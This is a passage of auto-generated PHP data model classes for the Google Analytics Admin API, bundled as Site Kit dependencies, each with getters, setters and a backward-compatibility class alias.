/* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaLinkProposalStatusDetails extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $linkProposalInitiatingProduct; /** * @var string */ public $linkProposalState; /** * @var string */ public $requestorEmail; /** * @param string */ public function setLinkProposalInitiatingProduct($linkProposalInitiatingProduct) { $this->linkProposalInitiatingProduct = $linkProposalInitiatingProduct; } /** * @return string */ public function getLinkProposalInitiatingProduct() { return $this->linkProposalInitiatingProduct; } /** * @param string */ public function setLinkProposalState($linkProposalState) { $this->linkProposalState = $linkProposalState; } /** * @return string */ public function getLinkProposalState() { return $this->linkProposalState; } /** * @param string */ public function setRequestorEmail($requestorEmail) { $this->requestorEmail = $requestorEmail; } /** * @return string */ public function getRequestorEmail() { return $this->requestorEmail; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaLinkProposalStatusDetails::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaLinkProposalStatusDetails'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaDataStreamIosAppStreamData extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $bundleId; /** * @var string */ public $firebaseAppId; /** * @param string */ public function setBundleId($bundleId) { $this->bundleId = $bundleId; } /** * @return string */ public function getBundleId() { return $this->bundleId; } /** * @param string */ public function setFirebaseAppId($firebaseAppId) { $this->firebaseAppId = $firebaseAppId; } /** * @return string */ public function getFirebaseAppId() { return $this->firebaseAppId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDataStreamIosAppStreamData::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaDataStreamIosAppStreamData'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksRequest extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'requests'; protected $requestsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUpdateUserLinkRequest::class; protected $requestsDataType = 'array'; /** * @param GoogleAnalyticsAdminV1alphaUpdateUserLinkRequest[] */ public function setRequests($requests) { $this->requests = $requests; } /** * @return GoogleAnalyticsAdminV1alphaUpdateUserLinkRequest[] */ public function getRequests() { return $this->requests; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaArchiveCustomDimensionRequest extends \Google\Site_Kit_Dependencies\Google\Model { } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaArchiveCustomDimensionRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaArchiveCustomDimensionRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessOrderByMetricOrderBy extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $metricName; /** * @param string */ public function setMetricName($metricName) { $this->metricName = $metricName; } /** * @return string */ public function getMetricName() { return $this->metricName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessOrderByMetricOrderBy::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessOrderByMetricOrderBy'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessFilter extends \Google\Site_Kit_Dependencies\Google\Model { protected $betweenFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessBetweenFilter::class; protected $betweenFilterDataType = ''; /** * @var string */ public $fieldName; protected $inListFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessInListFilter::class; protected $inListFilterDataType = ''; protected $numericFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessNumericFilter::class; protected $numericFilterDataType = ''; protected $stringFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessStringFilter::class; protected $stringFilterDataType = ''; /** * @param GoogleAnalyticsAdminV1betaAccessBetweenFilter */ public function setBetweenFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessBetweenFilter $betweenFilter) { $this->betweenFilter = $betweenFilter; } /** * @return GoogleAnalyticsAdminV1betaAccessBetweenFilter */ public function getBetweenFilter() { return $this->betweenFilter; } /** * @param string */ public function setFieldName($fieldName) { $this->fieldName = $fieldName; } /** * @return string */ public function getFieldName() { return $this->fieldName; } /** * @param GoogleAnalyticsAdminV1betaAccessInListFilter */ public function setInListFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessInListFilter $inListFilter) { $this->inListFilter = $inListFilter; } /** * @return GoogleAnalyticsAdminV1betaAccessInListFilter */ public function getInListFilter() { return $this->inListFilter; } /** * @param GoogleAnalyticsAdminV1betaAccessNumericFilter */ public function setNumericFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessNumericFilter $numericFilter) { $this->numericFilter = $numericFilter; } /** * @return GoogleAnalyticsAdminV1betaAccessNumericFilter */ public function getNumericFilter() { return $this->numericFilter; } /** * @param GoogleAnalyticsAdminV1betaAccessStringFilter */ public function setStringFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessStringFilter $stringFilter) { $this->stringFilter = $stringFilter; } /** * @return GoogleAnalyticsAdminV1betaAccessStringFilter */ public function getStringFilter() { return $this->stringFilter; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaListAudiencesResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'audiences'; protected $audiencesType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudience::class; protected $audiencesDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1alphaAudience[] */ public function setAudiences($audiences) { $this->audiences = $audiences; } /** * @return GoogleAnalyticsAdminV1alphaAudience[] */ public function getAudiences() { return $this->audiences; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListAudiencesResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListAudiencesResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaRunAccessReportRequest extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'orderBys'; protected $dateRangesType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessDateRange::class; protected $dateRangesDataType = 'array'; protected $dimensionFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessFilterExpression::class; protected $dimensionFilterDataType = ''; protected $dimensionsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessDimension::class; protected $dimensionsDataType = 'array'; /** * @var bool */ public $expandGroups; /** * @var bool */ public $includeAllUsers; /** * @var string */ public $limit; protected $metricFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessFilterExpression::class; protected $metricFilterDataType = ''; protected $metricsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessMetric::class; protected $metricsDataType = 'array'; /** * @var string */ public $offset; protected $orderBysType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessOrderBy::class; protected $orderBysDataType = 'array'; /** * @var bool */ public $returnEntityQuota; /** * @var string */ public $timeZone; /** * @param GoogleAnalyticsAdminV1betaAccessDateRange[] */ public function setDateRanges($dateRanges) { $this->dateRanges = $dateRanges; } /** * @return GoogleAnalyticsAdminV1betaAccessDateRange[] */ public function getDateRanges() { return $this->dateRanges; } /** * @param GoogleAnalyticsAdminV1betaAccessFilterExpression */ public function setDimensionFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessFilterExpression $dimensionFilter) { $this->dimensionFilter = $dimensionFilter; } /** * @return GoogleAnalyticsAdminV1betaAccessFilterExpression */ public function getDimensionFilter() { return $this->dimensionFilter; } /** * @param GoogleAnalyticsAdminV1betaAccessDimension[] */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return GoogleAnalyticsAdminV1betaAccessDimension[] */ public function getDimensions() { return $this->dimensions; } /** * @param bool */ public function setExpandGroups($expandGroups) { $this->expandGroups = $expandGroups; } /** * @return bool */ public function getExpandGroups() { return $this->expandGroups; } /** * @param bool */ public function setIncludeAllUsers($includeAllUsers) { $this->includeAllUsers = $includeAllUsers; } /** * @return bool */ public function getIncludeAllUsers() { return $this->includeAllUsers; } /** * @param string */ public function setLimit($limit) { $this->limit = $limit; } /** * @return string */ public function getLimit() { return $this->limit; } /** * @param GoogleAnalyticsAdminV1betaAccessFilterExpression */ public function setMetricFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessFilterExpression $metricFilter) { $this->metricFilter = $metricFilter; } /** * @return GoogleAnalyticsAdminV1betaAccessFilterExpression */ public function getMetricFilter() { return $this->metricFilter; } /** * @param GoogleAnalyticsAdminV1betaAccessMetric[] */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return GoogleAnalyticsAdminV1betaAccessMetric[] */ public function getMetrics() { return $this->metrics; } /** * @param string */ public function setOffset($offset) { $this->offset = $offset; } /** * @return string */ public function getOffset() { return $this->offset; } /** * @param GoogleAnalyticsAdminV1betaAccessOrderBy[] */ public function setOrderBys($orderBys) { $this->orderBys = $orderBys; } /** * @return GoogleAnalyticsAdminV1betaAccessOrderBy[] */ public function getOrderBys() { return $this->orderBys; } /** * @param bool */ public function setReturnEntityQuota($returnEntityQuota) { $this->returnEntityQuota = $returnEntityQuota; } /** * @return bool */ public function getReturnEntityQuota() { return $this->returnEntityQuota; } /** * @param string */ public function setTimeZone($timeZone) { $this->timeZone = $timeZone; } /** * @return string */ public function getTimeZone() { return $this->timeZone; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaRunAccessReportRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaRunAccessReportRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessFilterExpression extends \Google\Site_Kit_Dependencies\Google\Model { protected $accessFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessFilter::class; protected $accessFilterDataType = ''; protected $andGroupType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessFilterExpressionList::class; protected $andGroupDataType = ''; protected $notExpressionType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessFilterExpression::class; protected $notExpressionDataType = ''; protected $orGroupType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessFilterExpressionList::class; protected $orGroupDataType = ''; /** * @param GoogleAnalyticsAdminV1betaAccessFilter */ public function setAccessFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessFilter $accessFilter) { $this->accessFilter = $accessFilter; } /** * @return GoogleAnalyticsAdminV1betaAccessFilter */ public function getAccessFilter() { return $this->accessFilter; } /** * @param GoogleAnalyticsAdminV1betaAccessFilterExpressionList */ public function setAndGroup(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessFilterExpressionList $andGroup) { $this->andGroup = $andGroup; } /** * @return GoogleAnalyticsAdminV1betaAccessFilterExpressionList */ public function getAndGroup() { return $this->andGroup; } /** * @param GoogleAnalyticsAdminV1betaAccessFilterExpression */ public function setNotExpression(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessFilterExpression $notExpression) { $this->notExpression = $notExpression; } /** * @return GoogleAnalyticsAdminV1betaAccessFilterExpression */ public function getNotExpression() { return $this->notExpression; } /** * @param GoogleAnalyticsAdminV1betaAccessFilterExpressionList */ public function setOrGroup(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessFilterExpressionList $orGroup) { $this->orGroup = $orGroup; } /** * @return GoogleAnalyticsAdminV1betaAccessFilterExpressionList */ public function getOrGroup() { return $this->orGroup; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessFilterExpression::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessFilterExpression'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessMetric extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $metricName; /** * @param string */ public function setMetricName($metricName) { $this->metricName = $metricName; } /** * @return string */ public function getMetricName() { return $this->metricName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessMetric::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessMetric'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaDataStreamAndroidAppStreamData extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $firebaseAppId; /** * @var string */ public $packageName; /** * @param string */ public function setFirebaseAppId($firebaseAppId) { $this->firebaseAppId = $firebaseAppId; } /** * @return string */ public function getFirebaseAppId() { return $this->firebaseAppId; } /** * @param string */ public function setPackageName($packageName) { $this->packageName = $packageName; } /** * @return string */ public function getPackageName() { return $this->packageName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataStreamAndroidAppStreamData::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaDataStreamAndroidAppStreamData'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccount extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $createTime; /** * @var bool */ public $deleted; /** * @var string */ public $displayName; /** * @var string */ public $name; /** * @var string */ public $regionCode; /** * @var string */ public $updateTime; /** * @param string */ public function setCreateTime($createTime) { $this->createTime = $createTime; } /** * @return string */ public function getCreateTime() { return $this->createTime; } /** * @param bool */ public function setDeleted($deleted) { $this->deleted = $deleted; } /** * @return bool */ public function getDeleted() { return $this->deleted; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setRegionCode($regionCode) { $this->regionCode = $regionCode; } /** * @return string */ public function getRegionCode() { return $this->regionCode; } /** * @param string */ public function setUpdateTime($updateTime) { $this->updateTime = $updateTime; } /** * @return string */ public function getUpdateTime() { return $this->updateTime; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccount::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccount'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaProvisionAccountTicketResponse extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $accountTicketId; /** * @param string */ public function setAccountTicketId($accountTicketId) { $this->accountTicketId = $accountTicketId; } /** * @return string */ public function getAccountTicketId() { return $this->accountTicketId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaProvisionAccountTicketResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaProvisionAccountTicketResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaDataStream extends \Google\Site_Kit_Dependencies\Google\Model { protected $androidAppStreamDataType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataStreamAndroidAppStreamData::class; protected $androidAppStreamDataDataType = ''; /** * @var string */ public $createTime; /** * @var string */ public $displayName; protected $iosAppStreamDataType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataStreamIosAppStreamData::class; protected $iosAppStreamDataDataType = ''; /** * @var string */ public $name; /** * @var string */ public $type; /** * @var string */ public $updateTime; protected $webStreamDataType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataStreamWebStreamData::class; protected $webStreamDataDataType = ''; /** * @param GoogleAnalyticsAdminV1betaDataStreamAndroidAppStreamData */ public function setAndroidAppStreamData(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataStreamAndroidAppStreamData $androidAppStreamData) { $this->androidAppStreamData = $androidAppStreamData; } /** * @return GoogleAnalyticsAdminV1betaDataStreamAndroidAppStreamData */ public function getAndroidAppStreamData() { return $this->androidAppStreamData; } /** * @param string */ public function setCreateTime($createTime) { $this->createTime = $createTime; } /** * @return string */ public function getCreateTime() { return $this->createTime; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param GoogleAnalyticsAdminV1betaDataStreamIosAppStreamData */ public function setIosAppStreamData(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataStreamIosAppStreamData $iosAppStreamData) { $this->iosAppStreamData = $iosAppStreamData; } /** * @return GoogleAnalyticsAdminV1betaDataStreamIosAppStreamData */ public function getIosAppStreamData() { return $this->iosAppStreamData; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setUpdateTime($updateTime) { $this->updateTime = $updateTime; } /** * @return string */ public function getUpdateTime() { return $this->updateTime; } /** * @param GoogleAnalyticsAdminV1betaDataStreamWebStreamData */ public function setWebStreamData(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataStreamWebStreamData $webStreamData) { $this->webStreamData = $webStreamData; } /** * @return GoogleAnalyticsAdminV1betaDataStreamWebStreamData */ public function getWebStreamData() { return $this->webStreamData; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataStream::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaDataStream'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessFilterExpression extends \Google\Site_Kit_Dependencies\Google\Model { protected $accessFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessFilter::class; protected $accessFilterDataType = ''; protected $andGroupType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessFilterExpressionList::class; protected $andGroupDataType = ''; protected $notExpressionType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessFilterExpression::class; protected $notExpressionDataType = ''; protected $orGroupType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessFilterExpressionList::class; protected $orGroupDataType = ''; /** * @param GoogleAnalyticsAdminV1alphaAccessFilter */ public function setAccessFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessFilter $accessFilter) { $this->accessFilter = $accessFilter; } /** * @return GoogleAnalyticsAdminV1alphaAccessFilter */ public function getAccessFilter() { return $this->accessFilter; } /** * @param GoogleAnalyticsAdminV1alphaAccessFilterExpressionList */ public function setAndGroup(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessFilterExpressionList $andGroup) { $this->andGroup = 